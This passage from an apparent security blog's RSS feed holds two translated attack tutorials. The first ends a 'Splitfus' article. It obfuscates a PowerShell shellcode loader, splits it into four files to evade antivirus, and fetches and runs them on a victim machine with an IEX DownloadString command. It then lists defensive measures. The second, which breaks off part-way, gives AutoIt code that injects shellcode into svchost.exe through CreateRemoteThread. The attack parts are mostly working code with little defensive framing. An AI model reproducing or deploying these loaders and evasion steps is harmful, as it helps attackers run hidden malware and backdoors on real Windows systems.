0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,&#13;
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)&#13;
&#13;
function LookupFunc {&#13;
Param ($moduleName, $functionName)&#13;
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')&#13;
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}&#13;
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));&#13;
[IntPtr] $result = 0;&#13;
try {&#13;
Write-Host "First Invoke - $moduleName $functionName";&#13;
$result = $tmp[0].Invoke($null, @($handle, $functionName));&#13;
}catch {&#13;
Write-Host "Second Invoke - $moduleName $functionName";&#13;
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);&#13;
$result = $tmp[0].Invoke($null, @($handle, $functionName));&#13;
}&#13;
return $result;&#13;
}&#13;
&#13;
function getDelegateType {&#13;
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])&#13;
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])&#13;
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')&#13;
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')&#13;
return $type.CreateType()&#13;
}&#13;
&#13;
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)&#13;
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)&#13;
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)</pre>
<p>This is the PowerShell code to execute the Shellcode of Calc.exe on Windows, if we execute the entire code, it will be blocked by AV. And now I will apply Splitfus technique. First I will use the tool <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Ftokyoneon%2FChimera.git" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Chima</a> To disturb this code, it becomes harder to read with the following statement</p>
<p><code>./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1</code></p>
<p><img decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2025/07/screenshot-2025-07-19-121306-png.png" alt="Screenshot 2025-07-19 121306.png" title="How to use hackers use Splitfus technique to execute PowerShell 11 Code"/></p>
<p>Now, the PowerShell code was initially tangled by changing. Next, I will divide this file into smaller parts to execute in a discrete manner, making the security system unable to detect the typical signature of Shellcode</p>
<p>Next, I divided the SC-OBF.PS1 file into 4 separate files: SC1.PS1 (containing the shellcode storage variable), SC2.PS1 (containing the tangled LookupFunc function), SC3.PS1 (containing the tangled GetDelegatetype) and SC4.PS1 (containing the last 3 lines of code). Each part of this part is scanned individually will not cause warnings from AV. This is a disturbed and separate code of each file as I said</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc1.ps1&#13;
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,&#13;
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,&#13;
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,&#13;
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,&#13;
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,&#13;
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,&#13;
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)</pre>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc2.ps1&#13;
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {&#13;
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)&#13;
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')&#13;
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}&#13;
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));&#13;
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;&#13;
try {&#13;
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";&#13;
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));&#13;
}catch {&#13;
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";&#13;
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);&#13;
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));&#13;
}&#13;
return $XHcKpPqwXEaSejzfchayBW;&#13;
}</pre>
</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc3.ps1&#13;
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {&#13;
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])&#13;
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])&#13;
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')&#13;
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')&#13;
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()&#13;
}</pre>
</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc4.ps1&#13;
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)&#13;
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)&#13;
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)</pre>
<p>The steps to perform this Splitfus technique are also very simple. First, I used the following command to initialize the Python server on port 80 with the IP address of 192.168.1.17:</p>
<p><code>python3 -m http.server 80</code></p>
<p>This server will save the Script PowerShell files that have been separated and tangled, allowing the victim&#8217;s machine to download separate parts.</p>
<p>Finally, I created a brief execution command to execute on the victim&#8217;s machine</p>
<p><code>1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }</code></p>
<p>This command will download and execute each script file from SC1.PS1 to SC4.PS1. This is an effective way to overcome malicious detection mechanisms because each individual part can look harmless. When combined, they form a complete attack that many security solutions cannot be detected</p>
<p><img decoding="async" src="https://anonyviet.com/wp-content/uploads/2025/07/word-image-91200-4.gif" alt="How to use hackers use Splitfus technique to execute PowerShell 5 malicious code" title="How to use hackers use Splitfus technique to execute PowerShell 12 Code"/></p>
<p>With Metasploit, creating Shellcode becomes much easier. I will use the MSFVENOM command to create a new shellcode, then replace it with SC1.PS1. This allows me to customize the attack in many different directions, from taking the victim&#8217;s computer to steal information or install Backdoor</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fstreamable.com%2Frwoo4k" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">https://stroamable.com/rwoo4k</a></p>
<p>And these are simple examples, but in fact, PowerShell malicious code is not so simple. Hackers will have to use more techniques <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fbypass-amsi-va-thuc-thi-ma-doc-tren-windows%2F" class="local-link">BYPASS Amsi</a> To increase the success rate</p>
<h2 id="ftoc-cach-phong-thu-truoc-ky-thuat-splitfus" class="ftwp-heading"><strong>How to defend before Splitfus</strong></h2>
<p>Splitfus technique is one of the sophisticated powerhell attack methods, difficult to detect if the system is not closely monitored. In order to effectively defend before Splitfus, the network security team needs to synchronously deploy many active measures, from monitoring behavior to building an early warning system and ending training.</p>
<h3 id="ftoc-tang-cuong-giam-sat-powershell" class="ftwp-heading"><strong> Strengthen PowerShell monitoring</strong></h3>
<p>PowerShell is a tool that is often abused in modern attacks. To monitor abnormal operations, the system needs to turn on the Script Block Logging Diary feature (using the Event ID 4104) in combination with the logging module. These settings help save the entire PowerShell command that were executed, even when the OBFUSCATE was tangled. In addition, it is advisable to activate the Constrained Language Mode to limit the use of dangerous commands in the PowerShell execution environment.</p>
<h3 id="ftoc-kich-hoat-va-bao-ve-amsi-antimalware-scan-interface" class="ftwp-heading"><strong>Activate and protect AMSI (Antimalware Scan Interface)</strong></h3>
<p>Amsi is an important defense class that helps analyze the code before being executed in PowerShell. Make sure that Amsi is always enabled and not overcome (BYPASS) is essential. When integrated with Microsoft Defender or EDR solutions that support Amsi scanning, the ability to detect malicious code will be significantly improved, helping to prevent attacks from Splitfus early.</p>
<h3 id="ftoc-kiem-tra-hanh-vi-tai-dong-trong-he-thong" class="ftwp-heading"><strong>Check the dynamic load in the system</strong></h3>
<p>A common feature of Splitfus is to use dangerous parameters in PowerShell such as Encodedcommand or call the IEX function to download remote code via chain such as (New-Object net.webclient) .Downloadstring. The EDR or HIDS systems need to be configured to identify these behaviors. At the same time, it is necessary to be alert when detecting the script downloaded from unnecessary domain, especially the HTTP GET requirements containing the tail files .ps1.</p>
<h3 id="ftoc-thiet-lap-kiem-soat-truy-cap-mang-chat-che" class="ftwp-heading"><strong>Strict network access control</strong></h3>
<p>The network access control plays an important role in preventing Splitfus from communicating with the control server (C2 Server). It is necessary to actively block outbound connections to IP addresses or suspected domain. The proxy configuration combined with TLS test (TLS Inspection) will help detect the acting behavior hidden under encrypted connections. In addition, continuous updates of attack indicators (IOC) from Threat Intelligence Feed will improve the ability to identify and respond promptly.</p>
<p>Finally, the human element is always the weakest link in the defense chain. Propagating and training end users to raise security awareness is mandatory. Staff should be instructed not to run script from unclear sources. At the same time, the skill of identifying the fake email (Phishing) should also be focused because this is usually the starting point of Splitfus attacks.</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-use-hackers-use-splitfus-to-execute-powershell-malicious-code/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2025/07/word-image-91200-5.png" medium="image"></media:content>
            	</item>
		<item>
		<title>How to implement Shellcode Injection attack technique with Autoit</title>
		<link>https://en.anonyviet.com/how-to-implement-shellcode-injection-attack-technique-with-autoit/</link>
					<comments>https://en.anonyviet.com/how-to-implement-shellcode-injection-attack-technique-with-autoit/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 14 Mar 2025 02:08:08 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[AutoIT]]></category>
		<category><![CDATA[implement]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[Shellcode]]></category>
		<category><![CDATA[technique]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=18495</guid>

					<description><![CDATA[Understanding attack techniques is an important part to develop effective defensive measures. One of the outstanding attack methods is Shellcode Injectionallowing hackers to insert malicious code into the memory of the program running to execute malicious commands. Combined with Autoit is an easy -to -use programming that makes this technique more flexible and dangerous than [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Understanding attack techniques is an important part to develop effective defensive measures. One of the outstanding attack methods is <strong>Shellcode Injection</strong>allowing hackers to insert malicious code into the memory of the program running to execute malicious commands. Combined with Autoit is an easy -to -use programming that makes this technique more flexible and dangerous than ever.</p>
<div align="center">
<table class="aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">&#13;</p>
<tbody>&#13;</p>
<tr>&#13;</p>
<td style="width: 100%; text-align: center;">&#13;<br />
                        <span style="font-size: 12pt;">&#13;<br />
                            <strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">Anonyviet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" class="local-link">Link</a></span>  👈</strong>&#13;<br />
                        </span>&#13;
                    </td>
<p>&#13;<br />
                </tr>
<p>&#13;<br />
            </tbody>
<p>&#13;<br />
        </table>
</p></div>
<p>In this article, we will discover how to implement the Shellcode Injection technique with Autoit, from basic concepts to specific practice steps, in order to help you understand more about how it works.</p>
<p><strong>Note:</strong> This article is only for educational, research and learning purposes. Anonyviet is not responsible for all illegal acts</p>
<h2 id="ftoc-shellcode-injection-la-gi" class="ftwp-heading"><strong>What is Shellcode Injection?</strong></h2>
<p>Before going into details, let&#39;s find out the basic concept. Shellcode is a small binary code, often written in Assembly language, in order to perform a specific task (such as Shell open, to malicious software, &#8230;). Shellcode Injection is the process of inserting this code into the memory of a running process, then forcing the process to execute the code.</p>
<p>With the ability to manipulate memory and call Windows API functions, Autoit is the ideal programming language to perform this technique. We will take advantage of the functions available in Autoit&#39;s libraries to interact with the system</p>
<h2 id="ftoc-cach-thuc-hien-ki-thuat-shellcode-injection" class="ftwp-heading"><strong>How to implement Shellcode Injection</strong></h2>
<h3 id="ftoc-1-chuan-bi-moi-truong" class="ftwp-heading"><strong>1. Environmental preparation</strong></h3>
<p>To start, you need to prepare the following:</p>
<ul>
<li><strong>Download and install<a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.autoitscript.com%2Fsite%2Fautoit%2Fdownloads%2F" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"> Autoit:</a></strong> Make sure you have a Scite editor to write code</li>
<li><strong>Shellcode:</strong> You can create shellcode with tools like Metasploit (MSFVENOM) or write itself in assembly. For example, use the following command in Metasploit to create a shellcode to open calculator</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msfvenom -p windows/x64/exec CMD=calc.exe -f hex</pre>
<p>The result will be a Hex series such as: FC4883E4 &#8230; 32E65786500</p>
<ul>
<li><strong>Basic knowledge:</strong> Understand Windows API functions such as Virtualalloc, Rtlmovememory, and Createthread</li>
</ul>
<h3 id="ftoc-2-viet-code-autoit-thuc-hien-ki-thuat-shellcode-injection" class="ftwp-heading"><strong>2. Write code Autoit to perform Shellcode Injection</strong></h3>
<h4 id="ftoc-phan-khai-bao-thu-vien" class="ftwp-heading"><strong>The library declaration section</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#include <process.au3>&#13;
#include <memory.au3>&#13;
#include <winapi.au3>&#13;
#include <array.au3/></winapi.au3></memory.au3></process.au3></pre>
<p><code/><code/><code/><code/>These are library (Library) that Autoit uses to provide support functions:</p>
<ul>
<li><process.au3>: Support to work with the process (process), such as taking the name, checking PID.</process.au3></li>
<li><memory.au3>: Provide functions to manipulate memory, such as granting or writing data.</memory.au3></li>
<li><winapi.au3>: Allow to call Windows API functions (such as OpenProcess, WriteProcessmemory).</winapi.au3></li>
<li><array.au3>: Support to work with array (array), used to manage the process list.</array.au3></li>
</ul>
<p>To make it easier to understand, these are the &#8220;guide books&#8221; that the program needs to know how to work with the operating system</p>
<h4 id="ftoc-khai-bao-bien-toan-cuc" class="ftwp-heading"><strong>Give declaration of global variables</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Global $hexShellcode = "fc4883e4...32e65786500"</pre>
<p>$ Hexshellcode is the Shellcode code Hexa code (chain and letters like FC4883E4F). This is a small code that will be injected into the target process to execute</p>
<h4 id="ftoc-goi-cac-ham-chinh" class="ftwp-heading"><strong>Call the main functions</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">_CheckProcess()&#13;
_ProcessInjection()</pre>
<p>These two functions are the &#8220;brain head&#8221; of the program:</p>
<ul>
<li> _Checkprocess (): Check if the target process (svchost.exe) is running</li>
<li> _Processinjection (): Perform Shellcode injecting in the SVCHOST.EXE process</li>
</ul>
<h4 id="ftoc-ham-_checkprocess" class="ftwp-heading"><strong>Function _checkprocess ()</strong><code/><code/></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func _CheckProcess()&#13;
    ConsoleWrite("[+] Checking for target process" &amp; @CRLF &amp; @CRLF)&#13;
&#13;
    Global $targetPID = Find_Process("svchost.exe")&#13;
&#13;
    If Not $targetPID = 0 Then&#13;
        Global $targetProcName = _ProcessGetName($targetPID)&#13;
        ConsoleWrite("[+] Target process is running (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)&#13;
    ElseIf $targetPID = 0 Then&#13;
        ConsoleWrite("[!] Target process is not running. Exiting." &amp; @CRLF &amp; @CRLF)&#13;
        Exit&#13;
    EndIf&#13;
EndFunc</pre>
<p>This function checks if the SVCHOST.EXE process is running and taking its identification code (PID)</p>
<p>Detail:</p>
<ul>
<li><strong>Consolewrite (&#8220;[+] Checking for target process ”&#038; @CRLF &#038; @CRLF):</strong> Print the notice &#8220;Examining the target process&#8221;</li>
<li><strong>$ targetpid = Find_process (&#8220;SVCHOST.EXE&#8221;):</strong> Call the function to find_process to find pid of svchost.exe</li>
<li><strong>If not $ targetpid = 0:</strong> If you find PID (other than 0):</li>
</ul>
<p>&#8211;<strong> $ targetprocname = _ProcessgetName ($ targetpid):</strong> Take the process of the process from PID (use the library <process.au3>)</process.au3></p>
<p>&#8211; Print the notice confirming the running process</p>
<ul>
<li><strong>Elseif $ targetpid = 0:</strong> If not found, print error notifications and program escape (exit)</li>
</ul>
<h4 id="ftoc-ham-find_process" class="ftwp-heading"><strong>Find_process () function</strong><code/><code/></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func Find_Process($process)&#13;
    $loggedInUser = @UserName&#13;
    $processList = ProcessList()&#13;
    Dim $matchingProcesses[1]&#13;
&#13;
    For $i = 1 To $processList[0][0]&#13;
        $processName = $processList[$i][0]&#13;
        $processPID = $processList[$i][1]&#13;
&#13;
        If StringInStr($processName, $process) And _IsProcessOwner($processPID, $loggedInUser) Then&#13;
            ReDim $matchingProcesses[UBound($matchingProcesses) + 1]&#13;
            $matchingProcesses[UBound($matchingProcesses) - 1] = $processPID&#13;
        EndIf&#13;
    Next&#13;
&#13;
    If UBound($matchingProcesses) &gt; 1 Then&#13;
        $randomIndex = Random(1, UBound($matchingProcesses) - 1, 1)&#13;
        $randomPID = $matchingProcesses[$randomIndex]&#13;
        Return $randomPID&#13;
    Else&#13;
        Return ""&#13;
    EndIf&#13;
EndFunc</pre>
<p>This function finds all the processes with the name <strong>$ process</strong> (Here is &#8220;SVCHOST.EXE&#8221;) and randomly select a PID belongs to the current user. Detail:</p>
<ul>
<li><strong>$ loggedinuser = @username:</strong> Take the current username (for example, &#8220;admin&#8221;).</li>
<li><strong>$ processlist = processlist ():</strong> Get a list of all the process running on the device</li>
<li><strong>Dim $ matchingprocesses[1]:</strong> Create an array to save the appropriate pids</li>
<li><strong>For loop:</strong></li>
</ul>
<p>&#8211; Browse through each process in <strong>$ processlist</strong></p>
<p>&#8211;<strong> Stringinstr ($ processname, $ process):</strong> Check if the process name contains &#8220;svchost.exe&#8221;</p>
<p>&#8211; <strong>_Sprocessowner ($ processpid, $ loggedinuser):</strong> Check if the process belongs to the current user</p>
<p>&#8211; If both conditions are correct, add pid to the array<strong> $ matchingprocesses</strong></p>
<p><strong>Result: </strong></p>
<ul>
<li>If there is more than 1 joint process, randomly select a PID with Random () and return</li>
<li>If not found, return hollow string</li>
</ul>
<h4 id="ftoc-ham-_isprocessowner" class="ftwp-heading"><strong>Function _isprocessowner ()</strong><code/><code/></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func _IsProcessOwner($processPID, $username)&#13;
    Local $aWMI = ObjGet("winmgmts:\\.\root\cimv2")&#13;
    Local $colItems = $aWMI.ExecQuery("Select * from Win32_Process where ProcessID=" &amp; $processPID)&#13;
&#13;
    For $objItem In $colItems&#13;
        If $objItem.GetOwner() = $username Then&#13;
            Return 1&#13;
        EndIf&#13;
    Next&#13;
    Return 0&#13;
EndFunc</pre>
<p>This function checks if the process with the specific PID belongs to the current user ($ username). Detail:</p>
<ul>
<li><strong>$ Awmi = Objget (&#8220;winmgmts: \\. \ root \ cimv2&#8221;):</strong> Connect to WMI (Windows Management Instrumentation) to query system information</li>
<li><strong>$ colitems = $ awmi.execquery (&#8230;):</strong> Information query about the process with pid is<strong> $ processpid</strong></li>
<li>Loves: Check the owner (<strong>Getowner</strong>) of the process. If matched<strong> $ username</strong>return 1 (true); If not, return 0 (wrong)</li>
</ul>
<p>To make it easier to understand, this part is like checking if the phone number in the contacts is yours, to avoid calling the wrong person</p>
<h4 id="ftoc-ham-_ptr" class="ftwp-heading"><strong>Function _ptr ()</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func _ptr($s, $e = "")&#13;
    If $e &lt;&gt; "" Then Return DllStructGetPtr($s, $e)&#13;
    Return DllStructGetPtr($s)&#13;
EndFunc</pre>
<p>This function takes the &#8220;cursor&#8221; (address in memory) of a data structure (DLLSTRCT) details:</p>
<ul>
<li><strong>$ S:</strong> The structure needs to get the cursor</li>
<li><strong>$ e:</strong> Specific element in the structure (if any, but here is not used)</li>
<li><strong>Dllstructgetptr:</strong> Returns the memory address of the structure</li>
</ul>
<h4 id="ftoc-ham-sizeof" class="ftwp-heading"><strong>Sizeof () function</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func sizeof($s)&#13;
    Return DllStructGetSize($s)&#13;
EndFunc</pre>
<ul>
<li><strong>Meaning:</strong> This function returns the size (number of bytes) of a data structure</li>
<li><strong>Details: dllstructgetsize</strong> Calculate the size based on the definition of the structure</li>
</ul>
<h4 id="ftoc-ham-_processinjection" class="ftwp-heading"><strong>Function _Processinjection ()</strong><code/><code/></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func _ProcessInjection()&#13;
    Local $autoItshellcode = "0x" &amp; $hexShellcode&#13;
    Local $shellcodeBuffer = DllStructCreate("byte[" &amp; BinaryLen($autoItshellcode) &amp; "]")&#13;
    DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)&#13;
    ConsoleWrite("[+] Shellcode size: " &amp; sizeof($shellcodeBuffer) &amp; " bytes" &amp; @CRLF &amp; @CRLF)&#13;
    ConsoleWrite("[+] Injecting shellcode into PID:" &amp; $targetPID &amp; " (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)&#13;
&#13;
    $hProcess = _WinAPI_OpenProcess( _&#13;
        $PROCESS_ALL_ACCESS, _&#13;
        0, _&#13;
        $targetPID, _&#13;
        True)&#13;
&#13;
    $hRegion = _MemVirtualAllocEx( _&#13;
        $hProcess, _&#13;
        0, _&#13;
        sizeof($shellcodeBuffer), _&#13;
        $MEM_COMMIT + $MEM_RESERVE, _&#13;
        $PAGE_READWRITE)&#13;
&#13;
    Local $written&#13;
&#13;
    _WinAPI_WriteProcessMemory ( _&#13;
        $hProcess, _&#13;
        $hRegion, _&#13;
        _ptr($shellcodeBuffer), _&#13;
        sizeof($shellcodeBuffer), _&#13;
        $written)&#13;
&#13;
    $protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _&#13;
        "hwnd", $hProcess, _&#13;
        "ptr", $hRegion, _&#13;
        "ulong_ptr", sizeof($shellcodeBuffer), _&#13;
        "uint", 0x20, _&#13;
        "uint*", 0)&#13;
&#13;
    $hProtect = $protectCall[0]&#13;
&#13;
    $threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _&#13;
        "ptr", $hProcess, _&#13;
        "ptr", 0, _&#13;
        "int", 0, _&#13;
        "ptr", $hRegion, _&#13;
        "ptr", 0, _&#13;
        "int", 0, _&#13;
        "dword*", 0)&#13;
&#13;
    $hThread = $threadCall[0]&#13;
EndFunc</pre>
<p>The function _Processinjection () is the function that helps to bring malicious code into the target process (here is SVCHOST.EXE) and run it secretly, turning the legal process into malicious code. Detail:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Local $autoItshellcode = "0x" &amp; $hexShellcode&#13;
Local $shellcodeBuffer = DllStructCreate("byte[" &amp; BinaryLen($autoItshellcode) &amp; "]")&#13;
DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)&#13;
ConsoleWrite("[+] Shellcode size: " &amp; sizeof($shellcodeBuffer) &amp; " bytes" &amp; @CRLF &amp; @CRLF)&#13;
ConsoleWrite("[+] Injecting shellcode into PID:" &amp; $targetPID &amp; " (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)</pre>
<ul>
<li>Shellcode is the poison code we want to inject. Here, <strong>$ Hexshellcode</strong> As a Hexa coding chain (for example, &#8220;FC4883E4F&#8221;), and I added &#8220;0x&#8221; to turn it into a format that Autoit understands</li>
<li><strong>Create a buffer:</strong> DLLSRUCTOREATE creates a &#8220;buffer&#8221; (buffer) to save shellcode. The size of this box is equal to the length of Shellcode (binarianlen)</li>
<li><strong>Put Shellcode in the box:</strong> Dllstructsetdata put shellcode in the medium box</li>
<li><strong>Notification:</strong> Two consoleWrite commands display Shellcode size information and target process (pid and name) so that users know what is happening</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">$hProcess = _WinAPI_OpenProcess( _&#13;
$PROCESS_ALL_ACCESS, _&#13;
0, _&#13;
$targetPID, _&#13;
True)</pre>
<ul>
